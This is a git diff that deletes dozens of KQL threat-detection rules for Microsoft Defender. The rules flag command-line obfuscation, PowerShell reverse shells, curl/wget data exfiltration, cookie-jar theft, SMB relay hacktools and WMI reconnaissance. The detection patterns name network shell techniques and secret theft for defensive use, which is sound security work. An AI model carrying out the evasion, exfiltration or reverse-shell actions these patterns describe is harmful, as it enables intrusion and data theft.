index 026648ff..00000000
--- a/Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: xknow @xknow_infosec, Tim Shelton
-// Date: 2020/06/11
-// Level: high
-// Description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (((InitiatingProcessCommandLine contains "/c" or InitiatingProcessCommandLine contains "/k" or InitiatingProcessCommandLine contains "/r") or (ProcessCommandLine contains "/c" or ProcessCommandLine contains "/k" or ProcessCommandLine contains "/r")) and (InitiatingProcessFolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "cmd.exe") and (InitiatingProcessCommandLine =~ "/../../" or ProcessCommandLine contains "/../../")) and (not(ProcessCommandLine contains "\\Tasktop\\keycloak\\bin\\/../../jre\\bin\\java"))
\ No newline at end of file
diff --git a/Execution/Potential_Cookies_Session_Hijacking.kql b/Execution/Potential_Cookies_Session_Hijacking.kql
deleted file mode 100644
index 250526bc..00000000
--- a/Execution/Potential_Cookies_Session_Hijacking.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with the "-c" flag in order to save cookie data.
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine matches regex "\\s-c\\s" or ProcessCommandLine contains "--cookie-jar") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql b/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
deleted file mode 100644
index 5451ccc8..00000000
--- a/Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Hieu Tran
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
-// Tags: attack.command_and_control, attack.execution, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "IWR ") and (ProcessCommandLine contains "http" and ProcessCommandLine contains "OutFile" and ProcessCommandLine contains ".dll")
\ No newline at end of file
diff --git a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql b/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
deleted file mode 100644
index 33ee0fa7..00000000
--- a/Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects the use of various CLI utilities exfiltrating data via web requests
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "wget " or ProcessCommandLine contains "curl ") and (ProcessCommandLine contains " -ur" and ProcessCommandLine contains " -me" and ProcessCommandLine contains " -b" and ProcessCommandLine contains " POST ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or ((ProcessCommandLine contains "--ur" and FolderPath endswith "\\curl.exe") and (ProcessCommandLine contains " -d " or ProcessCommandLine contains " --data ")) or ((ProcessCommandLine contains "--post-data" or ProcessCommandLine contains "--post-file") and FolderPath endswith "\\wget.exe")) and ((ProcessCommandLine contains "Get-Content" or ProcessCommandLine contains "GetBytes" or ProcessCommandLine contains "hostname" or ProcessCommandLine contains "ifconfig" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "net view" or ProcessCommandLine contains "netstat" or ProcessCommandLine contains "nltest" or ProcessCommandLine contains "qprocess" or ProcessCommandLine contains "sc query" or ProcessCommandLine contains "systeminfo" or ProcessCommandLine contains "tasklist" or ProcessCommandLine contains "ToBase64String" or ProcessCommandLine contains "whoami") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > " and ProcessCommandLine contains " C:\\"))
\ No newline at end of file
diff --git a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql b/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
deleted file mode 100644
index 0f2eb648..00000000
--- a/Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @gott_cyber
-// Date: 2022/07/31
-// Level: medium
-// Description: Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.
-// Tags: attack.discovery, attack.execution, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/enumrecords" or ProcessCommandLine contains "/enumzones" or ProcessCommandLine contains "/ZonePrint" or ProcessCommandLine contains "/info") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Dosfuscation_Activity.kql b/Execution/Potential_Dosfuscation_Activity.kql
deleted file mode 100644
index d84c9691..00000000
--- a/Execution/Potential_Dosfuscation_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/15
-// Level: medium
-// Description: Detects possible payload obfuscation via the commandline
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql b/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
deleted file mode 100644
index a07c661e..00000000
--- a/Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: low
-// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql b/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
deleted file mode 100644
index 45a8fd0c..00000000
--- a/Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
-// Date: 2023/11/09
-// Level: medium
-// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
-The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql b/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
deleted file mode 100644
index 7010220a..00000000
--- a/Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/08
-// Level: high
-// Description: Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell "Get-Variable" technique as seen being used in Colibri Loader
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " -windowstyle hidden" or ProcessCommandLine endswith " -w hidden" or ProcessCommandLine endswith " -ep bypass" or ProcessCommandLine endswith " -noni") and (InitiatingProcessCommandLine contains "-k netsvcs" and InitiatingProcessCommandLine contains "-s Schedule") and InitiatingProcessFolderPath =~ "C:\\WINDOWS\\System32\\svchost.exe"
\ No newline at end of file
diff --git a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 96f4cd8e..00000000
--- a/Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: medium
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql b/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
deleted file mode 100644
index 901cfc87..00000000
--- a/Execution/Potential_PowerShell_Command_Line_Obfuscation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
-// Date: 2020/10/15
-// Level: high
-// Description: Detects the PowerShell command lines with special characters
-// Tags: attack.execution, attack.defense_evasion, attack.t1027, attack.t1059.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Downgrade_Attack.kql b/Execution/Potential_PowerShell_Downgrade_Attack.kql
deleted file mode 100644
index 1a70acae..00000000
--- a/Execution/Potential_PowerShell_Downgrade_Attack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Harish Segar (rule)
-// Date: 2020/03/20
-// Level: medium
-// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe"
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql b/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
deleted file mode 100644
index b0d3f76d..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: high
-// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc ")))
\ No newline at end of file
diff --git a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql b/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
deleted file mode 100644
index 94151df4..00000000
--- a/Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/07/09
-// Level: high
-// Description: Detects suspicious encoded character syntax often used for defense evasion
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "(WCHAR)0x"
\ No newline at end of file
diff --git a/Execution/Potential_Powershell_ReverseShell_Connection.kql b/Execution/Potential_Powershell_ReverseShell_Connection.kql
deleted file mode 100644
index 62c86967..00000000
--- a/Execution/Potential_Powershell_ReverseShell_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 1bbe2f01..00000000
--- a/Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 82b19961..00000000
--- a/Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali
-// Date: 2023/02/14
-// Level: medium
-// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Potential_RDP_Session_Hijacking_Activity.kql b/Execution/Potential_RDP_Session_Hijacking_Activity.kql
deleted file mode 100644
index b2e0b52b..00000000
--- a/Execution/Potential_RDP_Session_Hijacking_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @juju4
-// Date: 2022/12/27
-// Level: medium
-// Description: Detects potential RDP Session Hijacking activity on Windows systems
-// Tags: attack.execution
-DeviceProcessEvents
-| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and ProcessIntegrityLevel =~ "SYSTEM"
\ No newline at end of file
diff --git a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 439202c1..00000000
--- a/Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: blueteamer8699
-// Date: 2022/01/03
-// Level: medium
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe")))
\ No newline at end of file
diff --git a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql b/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
deleted file mode 100644
index 6e6b74ac..00000000
--- a/Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/30
-// Level: medium
-// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow
-// Tags: attack.execution, attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Renamed_Rundll32_Execution.kql b/Execution/Potential_Renamed_Rundll32_Execution.kql
deleted file mode 100644
index 195901b1..00000000
--- a/Execution/Potential_Renamed_Rundll32_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: high
-// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe"))
\ No newline at end of file
diff --git a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql b/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
deleted file mode 100644
index d7b1df2c..00000000
--- a/Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/07/24
-// Level: critical
-// Description: Detects different hacktools used for relay attacks on Windows for privilege escalation
-// Tags: attack.execution, attack.t1557.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains ".exe -c \"{" and ProcessCommandLine endswith "}\" -z") or (FolderPath contains "PetitPotam" or FolderPath contains "RottenPotato" or FolderPath contains "HotPotato" or FolderPath contains "JuicyPotato" or FolderPath contains "\\just_dce_" or FolderPath contains "Juicy Potato" or FolderPath contains "\\temp\\rot.exe" or FolderPath contains "\\Potato.exe" or FolderPath contains "\\SpoolSample.exe" or FolderPath contains "\\Responder.exe" or FolderPath contains "\\smbrelayx" or FolderPath contains "\\ntlmrelayx" or FolderPath contains "\\LocalPotato") or (ProcessCommandLine contains "Invoke-Tater" or ProcessCommandLine contains " smbrelay" or ProcessCommandLine contains " ntlmrelay" or ProcessCommandLine contains "cme smb " or ProcessCommandLine contains " /ntlm:NTLMhash " or ProcessCommandLine contains "Invoke-PetitPotam" or (ProcessCommandLine contains ".exe -t " and ProcessCommandLine contains " -p "))) and (not((FolderPath contains "HotPotatoes6" or FolderPath contains "HotPotatoes7" or FolderPath contains "HotPotatoes ")))
\ No newline at end of file
diff --git a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql b/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
deleted file mode 100644
index 5c5ff61b..00000000
--- a/Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: medium
-// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql b/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
deleted file mode 100644
index b329e821..00000000
--- a/Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Joseph Kamau
-// Date: 2024/05/27
-// Level: medium
-// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt.
-
-// Tags: attack.execution, attack.t1204.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe" or FolderPath startswith "") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")
\ No newline at end of file
diff --git a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a96027da..00000000
--- a/Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql b/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
deleted file mode 100644
index 0fec1416..00000000
--- a/Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: megan201296
-// Date: 2019/02/13
-// Level: high
-// Description: Detects registry keys related to Ursnif malware.
-// Tags: attack.execution, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "RegistryKeyCreated" and RegistryKey contains "\\Software\\AppDataLow\\Software\\Microsoft") and (not((RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Internet Explorer" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\RepService" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\IME" or RegistryKey contains "\\SOFTWARE\\AppDataLow\\Software\\Microsoft\\Edge")))
\ No newline at end of file
diff --git a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql b/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
deleted file mode 100644
index e0957f2c..00000000
--- a/Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Markus Neis @Karneades
-// Date: 2019/04/03
-// Level: medium
-// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
-// Tags: attack.execution, attack.t1047, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql b/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
deleted file mode 100644
index ea6c5d19..00000000
--- a/Execution/Potential_WinAPI_Calls_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/06
-// Level: high
-// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
-// Tags: attack.execution, attack.t1106
-DeviceProcessEvents
-| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine
contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe")))
\ No newline at end of file
diff --git a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
deleted file mode 100644
index 25ef6289..00000000
--- a/Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
+++ /dev/null
